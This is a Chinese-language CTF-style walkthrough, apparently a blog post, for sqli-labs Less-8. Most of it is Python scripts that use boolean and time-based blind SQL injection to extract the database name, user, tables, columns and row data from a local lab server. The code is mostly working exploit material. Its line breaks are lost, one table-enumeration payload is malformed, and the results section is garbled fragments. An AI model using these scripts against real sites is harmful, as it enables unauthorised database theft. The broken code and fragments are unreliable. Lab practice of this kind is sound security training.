在sqli-labs中的第8題無回顯可以嘗試盲注的手法獲取數據
發現頁面加載了3秒左右可以進行盲注
布爾盲注數據庫名
import requestsdef inject_database(url):dataname=''for i in range(1,15):low = 32high = 128mid = (low + high) // 2while low < high:path = "id=1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid)r = requests.get(url,path)if "You are in..........." in r.text:low = mid + 1else :high = midmid = (low + high) // 2if mid == 32:breakdataname += chr(mid)print(dataname)if __name__=='__main__':url = 'http://127.0.0.1:8989/Less-8/'inject_database(url)結果
用時間盲注出用戶名
import requests
import timedef inject_user(url):user=''for i in range(1,15):low = 32high = 128mid = (low + high) // 2while low < high:payload = f"1' and if(ascii(substr(user(), {i}, 1)) > {mid},sleep(1),0)-- "res = {"id":payload}start_time = time.time()r = requests.get(url,params=res)if (time.time() - start_time)>1:# 匹配成功low = mid + 1else :high = midmid = (low + high) // 2if mid == 32:breakuser += chr(mid)print(user)if __name__=='__main__':url = 'http://127.0.0.1:8989/Less-8/'inject_user(url)
結果
用盲注的方式查詢表、列、具體數據
if __name__ == '__main__':url = 'http://127.0.0.1:8989/Less-8/'# 獲取當前數據庫名database_name = inject_database(url)print(f"Database name: {database_name}")# 獲取數據庫中的表名tables = inject_tables(url, database_name)print(f"Tables in database '{database_name}': {tables}")# 獲取指定表中的列名table_name = 'users' # 替換為目標表名columns = inject_columns(url, table_name)print(f"Columns in table '{table_name}': {columns}")# 獲取指定表中特定列的數據column_name = 'username' # 替換為目標列名data = inject_data(url, table_name, column_name)print(f"Data in column '{column_name}' of table '{table_name}': {data}")時間檢測模塊
# 發送請求并檢查響應時間
def check_time_injection(url, payload):res = {"id": payload}start_time = time.time()r = requests.get(url, params=res)elapsed_time = time.time() - start_timereturn elapsed_time > 1 # 假設延遲超過1秒表示查詢成功數據庫模塊
# 獲取當前數據庫名
def inject_database(url):dataname=''for i in range(1,15):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid)res = {"id":payload}r = requests.get(url,params=res)if "You are in..........." in r.text:low = mid + 1else :high = midmid = (low + high) // 2if mid == 32:breakdataname += chr(mid)print(dataname)return dataname數據庫中表名模塊
# 獲取指定數據庫中的表名
def inject_tables(url, database_name):tables = []table_index = 0while True:table_index += 1table_name = ''for i in range(1, 20): # 假設表名長度不超過20字符low = 32high = 128while low < high:mid = (low + high) // 2payload = f",' and if(ascii(substr(select table_name from information_schema.tables where table_name='{database_name}' limit {table_index-1},1),{i},1 > {mid},sleep(1),0)-- "if check_time_injection(url, payload):low = mid + 1else:high = midif low == 32: # ASCII碼32為空格,通常表示結束breaktable_name += chr(low)print(f"Current table name: {table_name}")if table_name:tables.append(table_name)print(f"Found table: {table_name}")else:breakreturn tables列名模塊
def inject_columns(url, table_name):columns = []column_index = 0while True:column_index += 1column_name = ''for i in range(1, 20): # 假設列名長度不超過20字符low = 32high = 128while low < high:mid = (low + high) // 2payload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {column_index-1},1),{i},1)) > {mid},sleep(1),0) -- "if check_time_injection(url, payload):low = mid + 1else:high = midif low == 32: # ASCII碼32為空格,通常表示結束breakcolumn_name += chr(low)print(f"Current column name: {column_name}")if column_name:columns.append(column_name)print(f"Found column: {column_name}")else:breakreturn columns指定查詢數據模塊
# 獲取指定表中特定列的數據
def inject_data(url, table_name, column_name):data = []row_index = 0while True:row_index += 1row_value = ''for i in range(1, 20): # 假設數據長度不超過20字符low = 32high = 128while low < high:mid = (low + high) // 2payload = f"1' and if(ascii(substr((select {column_name} from {table_name} limit {row_index-1},1),{i},1)) > {mid},sleep(1),0) -- "if check_time_injection(url, payload):low = mid + 1else:high = midif low == 32: # ASCII碼32為空格,通常表示結束breakrow_value += chr(low)print(f"Current row value: {row_value}")if row_value:data.append(row_value)print(f"Found data: {row_value}")else:breakreturn data結果
數據庫
列
user
11)
)
)
)
